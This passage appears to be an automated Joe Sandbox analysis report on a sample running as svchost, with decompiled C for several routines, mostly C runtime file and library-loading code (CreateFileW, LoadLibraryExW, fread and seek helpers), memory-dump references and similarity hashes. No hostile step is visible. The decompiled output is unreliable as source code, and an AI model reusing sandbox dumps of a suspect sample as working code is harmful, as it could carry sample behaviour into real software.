                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction ID: 7820ddce9f5f1defbc10987eae1e93d047a4f985c6bb35140995f0b629dcaaaa
                            • Opcode Fuzzy Hash: d74e7f7bd27a0a5f0a2e088d0f7fae0308ba25fd7660655a9f0aee226c63ec2d
                            • Instruction Fuzzy Hash: FD019033614144ABCF219F58DC41DAD7B69EB81330B240289F8149B391FAB0DD408790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCCA68, Relevance: 3.1, APIs: 2, Instructions: 101COMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E00BCCA68(WCHAR* _a4, void* _a8) {
				void* _v8;
				void _v56;
				void* __edi;
				signed int _t17;
				void* _t18;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t25;
				signed int _t26;
				signed int _t34;
				signed int _t36;
				void* _t39;
				signed int _t42;
				signed int _t44;
				void* _t45;
				WCHAR* _t49;
				void* _t56;
				intOrPtr _t59;
				void* _t60;
				void* _t62;

				if(_a8 != 0) {
					_push(_t45);
					_t34 = 0;
					E00BC8520(_t45,  &_v56, 0, 0x30);
					_t36 = 0xc;
					memcpy(_a8,  &_v56, _t36 << 2);
					_t62 = _t60 + 0x18;
					_t49 = _a4;
					__eflags = _t49;
					if(_t49 != 0) {
						_t17 = E00BD5190(_t49, L"?*");
						_pop(_t39);
						__eflags = _t17;
						if(_t17 == 0) {
							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
							_push(_a8);
							_t56 = _t18;
							_v8 = _t56;
							__eflags = _t56 - 0xffffffff;
							if(__eflags == 0) {
								_push(_t49);
								_t19 = E00BCCB6F(_t39, _t44, _t49, __eflags);
							} else {
								_push(_t56);
								_push(0xffffffff);
								_push(_t49); // executed
								_t19 = E00BCCBFB(_t44); // executed
								_t62 = _t62 + 0x10;
							}
							__eflags = _t19;
							if(_t19 == 0) {
								E00BC8520(_t49,  &_v56, _t34, 0x30);
								_t34 = _t34 | 0xffffffff;
								__eflags = _t34;
								_t42 = 0xc;
								memcpy(_a8,  &_v56, _t42 << 2);
								_t56 = _v8;
							}
							__eflags = _t56 - 0xffffffff;
							if(_t56 != 0xffffffff) {
								CloseHandle(_t56);
							}
							_t20 = _t34;
							L15:
							return _t20;
						}
						_t25 = E00BCC9CE();
						_t59 = 2;
						 *_t25 = _t59;
						_t26 = E00BCC9BB();
						 *_t26 = _t59;
						L6:
						_t20 = _t26 | 0xffffffff;
						goto L15;
					}
					 *(E00BCC9BB()) = 0;
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					_t26 = E00BD1788();
					goto L6;
				}
				 *(E00BCC9BB()) =  *_t29 & 0x00000000;
				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
				return E00BD1788() | 0xffffffff;
			}























                            0x00bcca74
                            0x00bcca98
                            0x00bcca9b
                            0x00bccaa2
                            0x00bccab2
                            0x00bccab3
                            0x00bccab3
                            0x00bccab5
                            0x00bccab8
                            0x00bccaba
                            0x00bccadb
                            0x00bccae1
                            0x00bccae2
                            0x00bccae4
                            0x00bccb0d
                            0x00bccb13
                            0x00bccb16
                            0x00bccb18
                            0x00bccb1b
                            0x00bccb1e
                            0x00bccb2e
                            0x00bccb2f
                            0x00bccb20
                            0x00bccb20
                            0x00bccb21
                            0x00bccb23
                            0x00bccb24
                            0x00bccb29
                            0x00bccb29
                            0x00bccb36
                            0x00bccb38
                            0x00bccb41
                            0x00bccb4f
                            0x00bccb4f
                            0x00bccb54
                            0x00bccb55
                            0x00bccb57
                            0x00bccb57
                            0x00bccb5a
                            0x00bccb5d
                            0x00bccb60
                            0x00bccb60
                            0x00bccb66
                            0x00bccb68
                            0x00000000
                            0x00bccb6a
                            0x00bccae6
                            0x00bccaed
                            0x00bccaee
                            0x00bccaf0
                            0x00bccaf5
                            0x00bccaf7
                            0x00bccaf7
                            0x00000000
                            0x00bccaf7
                            0x00bccac1
                            0x00bccac8
                            0x00bccace
                            0x00000000
                            0x00bccace
                            0x00bcca7b
                            0x00bcca83
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
                            • Instruction ID: f0de4c3dc31bde5c32b23e09d9b28a932663bd49cee2a7f28384d8d4f4b2e188
                            • Opcode Fuzzy Hash: 773d7f38ceb036a4f5e3af9875c8baa617566c7472c25bffb9b3bccefcadf1b0
                            • Instruction Fuzzy Hash: F731D97190020CBADB217BA49C86FAE3BE8DF12735F200299F9686B1D1DBB05D019665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC13D0, Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E00BC13D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				void* _v8;
				char _v92;
				void* _v100;
				char _v104;
				signed int _t12;
				signed int _t14;
				void* _t17;
				void* _t21;
				intOrPtr* _t31;
				char* _t35;
				signed int _t42;
				void* _t43;

				_t42 =  &_v100;
				_t12 =  *0xbec008; // 0x2eb5fe5e
				_v4 = _t12 ^ _t42;
				_t31 = _a4;
				_t35 =  &_v92;
				_t21 = _a8 + 0xffffffa0;
				_t14 = E00BC9F16(__edx,  *_t31, _t21, 0); // executed
				_t43 = _t42 + 0xc;
				if(_t14 != 0) {
					L5:
					E00BC786A();
					return _t14 | 0xffffffff;
				} else {
					_t14 = E00BC9B2B( &_v100, 0x60, 1,  *_t31); // executed
					_t43 = _t43 + 0x10;
					if(_t14 < 1) {
						goto L5;
					} else {
						while(1) {
							_t17 = E00BC9780(0xbe0340, _t35, 8);
							_t43 = _t43 + 0xc;
							if(_t17 == 0) {
								break;
							}
							_t35 = _t35 - 1;
							_t14 =  &_v100;
							if(_t35 >= _t14) {
								continue;
							} else {
								goto L5;
							}
							goto L7;
						}
						asm("movups xmm0, [esi]");
						asm("movups [edi+0x10], xmm0");
						asm("movups xmm0, [esi+0x10]");
						asm("movups [edi+0x20], xmm0");
						asm("movups xmm0, [esi+0x20]");
						asm("movups [edi+0x30], xmm0");
						asm("movups xmm0, [esi+0x30]");
						asm("movups [edi+0x40], xmm0");
						asm("movups xmm0, [esi+0x40]");
						asm("movups [edi+0x50], xmm0");
						asm("movq xmm0, [esi+0x50]");
						asm("movq [edi+0x60], xmm0");
						_push( *((intOrPtr*)(_t31 + 0x18)));
						L00BC7864();
						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
						E00BC786A();
						return 0;
					}
				}
				L7:
			}
















                            0x00bc13d0
                            0x00bc13d3
                            0x00bc13da
                            0x00bc13e5
                            0x00bc13e9
                            0x00bc13ef
                            0x00bc13f5
                            0x00bc13fa
                            0x00bc13ff
                            0x00bc143d
                            0x00bc1449
                            0x00bc1451
                            0x00bc1401
                            0x00bc140c
                            0x00bc1411
                            0x00bc1417
                            0x00000000
                            0x00bc1420
                            0x00bc1420
                            0x00bc1428
                            0x00bc142d
                            0x00bc1432
                            0x00000000
                            0x00000000
                            0x00bc1434
                            0x00bc1435
                            0x00bc143b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bc143b
                            0x00bc1452
                            0x00bc1455
                            0x00bc1459
                            0x00bc145d
                            0x00bc1461
                            0x00bc1465
                            0x00bc1469
                            0x00bc146d
                            0x00bc1471
                            0x00bc1475
                            0x00bc1479
                            0x00bc147e
                            0x00bc1483
                            0x00bc1486
                            0x00bc149e
                            0x00bc14a6
                            0x00bc14ae
                            0x00bc14ae
                            0x00bc1417
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction ID: 1e82537b5a56d4b96169fa9a5473ff706fd661c50897dbb97d0780f7f272d75a
                            • Opcode Fuzzy Hash: 97bbcec2b5d3a7bbfad269f17599036ca15f58a2a9f729a2676a345977fc263a
                            • Instruction Fuzzy Hash: B121F232E04B41A7D2149B398C02BA6F3E0FFA8304F809B1DF99862642FB21F5D4C681
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC9FC9, Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00BC9FC9(signed int __edx, intOrPtr* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t64;
				signed int _t66;
				signed char _t68;
				signed int _t70;
				signed char _t77;
				intOrPtr* _t78;
				signed int _t79;
				signed char _t80;
				intOrPtr _t82;
				intOrPtr _t83;
				signed int _t90;
				intOrPtr _t93;
				signed int _t94;
				intOrPtr* _t95;
				signed char _t96;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t120;

				_t104 = __edx;
				if(_a4 != 0) {
					_t64 = E00BD09C5(_a4);
					_t93 = _a4;
					_t118 = _t64;
					__eflags =  *(_t93 + 8);
					if( *(_t93 + 8) < 0) {
						 *(_t93 + 8) = 0;
					}
					_t66 = E00BD27EC(_t118, 0, 0, 1); // executed
					_t90 = _t104;
					_t109 = _t66;
					_v12 = _t109;
					__eflags = _t90;
					if(__eflags > 0) {
						L7:
						_t68 =  *(_a4 + 0xc);
						__eflags = _t68 & 0x000000c0;
						if((_t68 & 0x000000c0) != 0) {
							_t70 = _t118 >> 6;
							_t94 = (_t118 & 0x0000003f) * 0x30;
							_v16 = _t70;
							_v20 = _t94;
							_t95 = _a4;
							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0xbf6108 + _t70 * 4)) + 0x29));
							_t96 =  *(_t95 + 0xc);
							asm("cdq");
							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
							__eflags = _t96 & 0x00000003;
							if((_t96 & 0x00000003) == 0) {
								_t77 =  *(_a4 + 0xc) >> 2;
								__eflags = _t77 & 0x00000001;
								if((_t77 & 0x00000001) != 0) {
									L23:
									_t78 = _a4;
									L24:
									__eflags = _t109 | _t90;
									if((_t109 | _t90) == 0) {
										L30:
										_t79 = _t120;
										goto L31;
									}
									_t80 =  *(_t78 + 0xc);
									__eflags = _t80 & 0x00000001;
									if((_t80 & 0x00000001) == 0) {
										__eflags = _v5 - 1;
										if(_v5 == 1) {
											_t120 = E00BC7AE0(_t120, _t104, 2, 0);
										}
										_t120 = _t120 + _t109;
										asm("adc edx, ebx");
										goto L30;
									}
									_t79 = E00BCA15E(_a4, _t109, _t90, _t120, _t104);
									goto L31;
								}
								_t66 = E00BCC9CE();
								 *_t66 = 0x16;
								goto L22;
							}
							__eflags = _v5 - 1;
							_t99 = _v16;
							if(_v5 != 1) {
								L13:
								_t82 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
								_t100 = _v20;
								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
									goto L23;
								}
								_t78 = _a4;
								_v20 = _v20 & 0x00000000;
								_t111 =  *(_t78 + 4);
								__eflags =  *_t78 - _t111;
								asm("sbb edi, edi");
								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
								__eflags = _t113;
								_v16 = _t113;
								_t109 = _v12;
								if(_t113 == 0) {
									goto L24;
								}
								_t103 =  *(_t78 + 4);
								_t114 = _v20;
								do {
									__eflags =  *_t103 - 0xa;
									if( *_t103 == 0xa) {
										_t120 = _t120 + 1;
										asm("adc edx, 0x0");
									}
									_t103 = _t103 + 1;
									_t114 = _t114 + 1;
									__eflags = _t114 - _v16;
								} while (_t114 != _v16);
								_t109 = _v12;
								goto L24;
							}
							_t115 = _v20;
							_t83 =  *((intOrPtr*)(0xbf6108 + _t99 * 4));
							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
							_t109 = _v12;
							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t79 = E00BCA2E2(_a4, _t109, _t90);
							goto L31;
						}
						asm("cdq");
						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ebx, edx");
						goto L31;
					} else {
						if(__eflags < 0) {
							L22:
							_t79 = _t66 | 0xffffffff;
							L31:
							return _t79;
						}
						__eflags = _t109;
						if(_t109 < 0) {
							goto L22;
						}
						goto L7;
					}
				}
				 *((intOrPtr*)(E00BCC9CE())) = 0x16;
				return E00BD1788() | 0xffffffff;
			}
































                            0x00bc9fc9
                            0x00bc9fd5
                            0x00bc9ff5
                            0x00bc9ffb
                            0x00bc9ffe
                            0x00bca002
                            0x00bca005
                            0x00bca007
                            0x00bca007
                            0x00bca011
                            0x00bca016
                            0x00bca01b
                            0x00bca01d
                            0x00bca020
                            0x00bca022
                            0x00bca032
                            0x00bca035
                            0x00bca038
                            0x00bca03a
                            0x00bca055
                            0x00bca058
                            0x00bca05b
                            0x00bca065
                            0x00bca06c
                            0x00bca06f
                            0x00bca077
                            0x00bca07a
                            0x00bca07b
                            0x00bca07d
                            0x00bca080
                            0x00bca104
                            0x00bca107
                            0x00bca109
                            0x00bca11d
                            0x00bca11d
                            0x00bca120
                            0x00bca122
                            0x00bca124
                            0x00bca155
                            0x00bca155
                            0x00000000
                            0x00bca155
                            0x00bca126
                            0x00bca129
                            0x00bca12b
                            0x00bca13e
                            0x00bca142
                            0x00bca14f
                            0x00bca14f
                            0x00bca151
                            0x00bca153
                            0x00000000
                            0x00bca153
                            0x00bca134
                            0x00000000
                            0x00bca139
                            0x00bca10b
                            0x00bca110
                            0x00000000
                            0x00bca110
                            0x00bca082
                            0x00bca086
                            0x00bca089
                            0x00bca0b1
                            0x00bca0b1
                            0x00bca0b8
                            0x00bca0bb
                            0x00bca0c0
                            0x00000000
                            0x00000000
                            0x00bca0c2
                            0x00bca0c5
                            0x00bca0ce
                            0x00bca0d1
                            0x00bca0d3
                            0x00bca0d7
                            0x00bca0d7
                            0x00bca0d9
                            0x00bca0dc
                            0x00bca0df
                            0x00000000
                            0x00000000
                            0x00bca0e1
                            0x00bca0e4
                            0x00bca0e7
                            0x00bca0e7
                            0x00bca0ea
                            0x00bca0ec
                            0x00bca0ef
                            0x00bca0ef
                            0x00bca0f2
                            0x00bca0f3
                            0x00bca0f4
                            0x00bca0f4
                            0x00bca0f9
                            0x00000000
                            0x00bca0f9
                            0x00bca08b
                            0x00bca08e
                            0x00bca095
                            0x00bca09a
                            0x00bca09d
                            0x00000000
                            0x00000000
                            0x00bca0a4
                            0x00000000
                            0x00bca0a9
                            0x00bca042
                            0x00bca045
                            0x00bca047
                            0x00000000
                            0x00bca024
                            0x00bca024
                            0x00bca116
                            0x00bca116
                            0x00bca157
                            0x00000000
                            0x00bca159
                            0x00bca02a
                            0x00bca02c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bca02c
                            0x00bca022
                            0x00bc9fdc
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction ID: 06f90de71917399901a4da8fb41af17769d9c45d04c9d0061b4bc8f9ee6dd2e4
                            • Opcode Fuzzy Hash: 0d1fc46791b9e3200a6fce7744e3afeebe35c6002caad1449ffb62de4669e78d
                            • Instruction Fuzzy Hash: 2B51A331A00108AFDB10DF58CC45FA97BE1EB86368F1981DCE859AB392C731ED42CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD5E01, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00BD5E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t25;

				E00BD5BBD( &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 != 0) {
					_t25 = E00BDC048( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t25 != 0) {
						goto L1;
					}
					 *0xbf5e8c =  *0xbf5e8c + 1;
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_a16 + 8)) = 0;
					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
					 *((intOrPtr*)(_a16 + 4)) = 0;
					 *_a16 = 0;
					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
					return _a16;
				}
				L1:
				return 0;
			}









                            0x00bd5e12
                            0x00bd5e1e
                            0x00bd5e1f
                            0x00bd5e20
                            0x00bd5e27
                            0x00bd5e3f
                            0x00bd5e49
                            0x00000000
                            0x00000000
                            0x00bd5e4e
                            0x00bd5e5a
                            0x00bd5e62
                            0x00bd5e68
                            0x00bd5e6e
                            0x00bd5e74
                            0x00bd5e7c
                            0x00000000
                            0x00bd5e7f
                            0x00bd5e29
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction ID: 4749c0ad2d4d7a32950f73a485365c86cc4aa61e214a628b243b54308546b5e9
                            • Opcode Fuzzy Hash: 28979cc709d8941b9c4d28f71ba508f7fcaafc182ec92faab910ec3ddf5a8fc4
                            • Instruction Fuzzy Hash: 0711187190410AAFCF15DF58E94199B7BF4EF49310F10449AF808AB311E671DA25CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC9813, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E00BC9813(void* __ecx, intOrPtr _a4) {
				void* _t16;
				void* _t24;
				signed int _t25;
				signed int _t26;
				intOrPtr _t28;

				_t28 = _a4;
				if(_t28 == 0) {
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					return E00BD1788() | 0xffffffff;
				}
				_push(_t25);
				_t26 = _t25 | 0xffffffff;
				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t26 = E00BCDA31(_t24, _t28);
					E00BD1AED(_t28);
					_t16 = E00BD1875(E00BD09C5(_t28)); // executed
					if(_t16 >= 0) {
						if( *(_t28 + 0x1c) != 0) {
							E00BD09EB( *(_t28 + 0x1c));
							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
						}
					} else {
						_t26 = _t26 | 0xffffffff;
					}
				}
				E00BD19EF(_t28);
				return _t26;
			}








                            0x00bc9819
                            0x00bc981e
                            0x00bc9825
                            0x00000000
                            0x00bc9830
                            0x00bc9838
                            0x00bc9839
                            0x00bc9841
                            0x00bc984a
                            0x00bc984c
                            0x00bc9858
                            0x00bc9862
                            0x00bc986d
                            0x00bc9872
                            0x00bc9877
                            0x00bc987b
                            0x00bc9864
                            0x00bc9864
                            0x00bc9864
                            0x00bc9862
                            0x00bc987d
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction ID: 3ec6ac1e0fac62b92dd238b78566d40616af34fe1b7c88307c26b85daa2e9e91
                            • Opcode Fuzzy Hash: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction Fuzzy Hash: F6F0283250261067EB21766DDC09F5B76D88F433B0F110B9EF565D33D2EB74D80286A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC4590, Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BC4590(char* _a4) {
				struct HINSTANCE__* _t3;

				_t6 = E00BC4BF0(0, _a4, 0);
				_t3 = LoadLibraryExW(_t2, 0, 8); // executed
				L00BC9803(_t6);
				return _t3;
			}




                            0x00bc45a2
                            0x00bc45a9
                            0x00bc45b2
                            0x00bc45be

                            APIs
                              • Part of subcall function 00BC4BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,00BC4117,?,?,00001000), ref: 00BC4C08
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,00BC3540,?,?,?,?,00000000,00BC263F,00000000,00000000), ref: 00BC45A9
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharLibraryLoadMultiWide
                            • String ID:
                            • API String ID: 2592636585-0
                            • Opcode ID: c484b7fa667f8a2eeae4308530e4419f6ce8845a633c1366325e0087f3044667
                            • Instruction ID: 81004cdbffbcb28dd2e88db96e21640bd340ff13311145dcfb4d3e358e47d8f2
                            • Opcode Fuzzy Hash: c484b7fa667f8a2eeae4308530e4419f6ce8845a633c1366325e0087f3044667
                            • Instruction Fuzzy Hash: 9BD0A773B4025033F66062A53C0BF5F75A49BD2F52F050479F708DB1D1E990980943A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDBA5E, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BDBA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                            0x00bdba7b
                            0x00bdba82

                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction ID: e6c2dc39c6a3e5e5a840c712e2216bd12e6a74069c8087d7a4322ccfe7085d00
                            • Opcode Fuzzy Hash: 0f0379c88d42d7e089d2f871db34dca2536e7dac28ce646b8e42097dde967d91
                            • Instruction Fuzzy Hash: 1DD06C3201014DBBDF029F84ED46EDA3BAAFB48714F014100BA1856020C776E861AB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 6DAAD570, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOk:RegisterDeviceNotification,?,?,?), ref: 6DAAD58B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAD5A7
                            • PyObject_AsReadBuffer.PYTHON38(?,?,?), ref: 6DAAD5C2
                            • PyErr_Format.PYTHON38(6E28ED94,buffer isn't a DEV_BROADCAST_* structure: structure says it has %d bytes, but %d was provided,?,?), ref: 6DAAD5EB
                            Strings
                            • OOk:RegisterDeviceNotification, xrefs: 6DAAD582
                            • RegisterDeviceNotification, xrefs: 6DAAD625
                            • buffer isn't a DEV_BROADCAST_* structure: structure says it has %d bytes, but %d was provided, xrefs: 6DAAD5E4
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
